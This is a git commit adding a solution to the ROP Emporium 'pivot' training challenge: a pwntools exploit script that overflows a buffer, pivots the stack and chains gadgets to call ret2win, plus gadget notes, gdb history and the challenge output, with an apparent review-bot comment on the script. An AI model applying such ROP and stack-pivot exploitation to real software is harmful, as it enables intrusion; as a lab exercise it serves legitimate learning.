new file: x86_64/pivot/exploit.py

new file:   x86_64/pivot/gadgets
This commit is contained in:
Brett Weiland 2020-12-18 19:06:39 -06:00
parent 406768c5fe
commit a6439b8ec3
5 changed files with 244 additions and 0 deletions

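--- a/x86_64/pivot/.gdb_history
+++ b/x86_64/pivot/.gdb_history
@@ -0,0 +1,145 @@
+starti
+context
+break *pwnme
+continue
+context
+x/i 0x7f2041e78f10
+stepi
+return
+stepi
+nexti
+nexti
+stepi
+return
+nexti
+q
+quit
+exit
+exit
+quit
+quit
+quit
+quit
+continue
+stepi
+quit
+quit
+continue
+stepi
+return
+nexti
+asdf
+continue
+nexti
+continue
+nexti
+continue
+context
+help
+nexti
+quit
+quit
+continue
+continue
+quit
+quit
+continue
+stepi
+nexti
+quit
+quit
+continue
+nexti
+quit
+continue
+exit
+quit
+continue
+quit
+continue
+quit
+continue
+continue
+quit
+continue
+break *pwnme + 181
+continue
+x/i pwnme + 181
+x/i *pwnme + 181
+x/i *pwnme + 180
+x/i *pwnme
+x/100i *pwnme
+x/10i *pwnme
+x/20i *pwnme
+x/30i *pwnme
+x/20i *pwnme
+quit
+continue
+stepi
+stepi
+stepi
+stepi
+info reg rax
+stepi
+stepi
+info reg rsp
+x/x rsp
+x/x $rsp
+x/x *$rsp
+x/x $rsp
+quit
+continue
+Quit
+quit
+continue
+continue
+quit
+continue
+continue
+quit
+continue
+quit
+continue
+continue
+continue
+quit
+continue
+nexti
+quit
+continue
+nexti
+x/x $edi
+nexti
+nexti
+x/x $edi
+nexti
+x/i 0x7f3a079a95a3
+quit
+continue
+continue
+quit
+quit
+continue
+quit
+continue
+continue
+nexti
+nexti
+info reg rax
+x/x $rax
+stepi
+stepi
+stepi
+stepi
+return
+context
+stepi
+info reg rbp
+stepi
+info reg rbp
+stepi
+info reg rax
+info reg rbp
+info 0x60103a
+x/x 0x60103a
+quit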

43
x86_64/pivot/exploit.py Executable file

@ -0,0 +1,43 @@
#!/usr/bin/env python3
from pwn import *
from os import getcwd
import re
#context.terminal = ['kitty', 'sh', '-c']
print(context.terminal)
prog = gdb.debug('./pivot', gdbscript='''
b pwnme
b *0x4009a5
'''
)
payload = b''
payload += p64(0x0000000000400720) # foothold@plt
payload += p64(0x4009bb) # pop rax
payload += p64(601040) # foothold@plt's .got.plt entry
payload += p64(0x00000000004007c8) # pop rbp
payload += p64(279) # should be the offset of pwnem from foothold's .got.plt
payload += p64(0x4009c4) # adds the two
payload += p64(0x00000000004007c1) # jmp rax
prog.sendline(payload)
pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16)
print(hex(pivit_location))
payload = b''
#buffer overflow
for c in range(40):
payload += b'a'
payload += p64(0x4009bb) # pop rax
payload += p64(pivit_location) # pivot location
payload += p64(0x4009bd) # xchg rsp,rax
prog.sendlineafter('Now please send your stack smash', payload)
prog.interactive()
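Review bot: The pattern `'0x[0-9a-z]{12}'` on the `readregexS` line accepts any lowercase letter rather than only hex digits, and it is written as a plain string rather than a raw string; the transcript in `test` shows the address is plain hex, so `r'0x[0-9a-f]{12}'` in both the `readregexS` call and the `re.findall` call is the tighter match. `from os import getcwd` is unused, `print(context.terminal)` looks like a debug leftover beside the commented-out terminal setting, and `pivit_location`/`pwnem` are typos. The `p64(601040)` line is the only address literal without a `0x` prefix; whether the decimal form is deliberate should be stated in its comment, since every neighbouring line uses hex. The byte-padding loop `for c in range(40): payload += b'a'` is the same as `payload += b'a' * 40`, and a short module docstring naming the ROP Emporium `pivot` challenge and the binary the hard-coded gadget addresses were taken from would help the next reader.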

44
x86_64/pivot/gadgets Normal file

@ -0,0 +1,44 @@
Goal is to call ret2win from libpivot
we don't know where ret2win is, but we do know where foothold_function is
pivot is at 0x7f2041e78f10
0x0000000000400720 : foothold_function@plt
0x000000000000096a : foothold_function
resolve ret2win:
1: resolve foothold_function
resolved foothold: [0x400720 + 0x20091a]
offset of foothold vs
2: ret2win = [0x400720 + 0x20091a] + 279
64 rop chains possible at 0x7eff3d368f10
6 rop chains possible at buffer overflow
0x00000000004007c8 : pop rbp ; ret
0x00000000004007c1 : jmp rax
00000000004009bb <usefulGadgets>:
4009bb: 58 pop rax
4009bc: c3 ret
4009bd: 48 94 xchg rsp,rax
4009bf: c3 ret
4009c0: 48 8b 00 mov rax,QWORD PTR [rax]
4009c3: c3 ret
4009c4: 48 01 e8 add rax,rbp
4009c7: c3 ret
1: resolve foothold (2)
4: pop rax (rax is 0x400720 + 0x20091a)
5: pop rbp (rpb is 279)
6: add rax, rbp
7: mov rax, [rax]
8: jmp rax
2: pop rax (4)
3: xchg rsp,rax (5)

BIN
x86_64/pivot/stest Normal file


12
x86_64/pivot/test Normal file

@ -0,0 +1,12 @@
pivot by ROP Emporium
x86_64
Call ret2win() from libpivot
The Old Gods kindly bestow upon you a place to pivot: 0x7f93a9160f10
Send a ROP chain now and it will land there
> Thank you!
Now please send your stack smash
> Thank you!
Exiting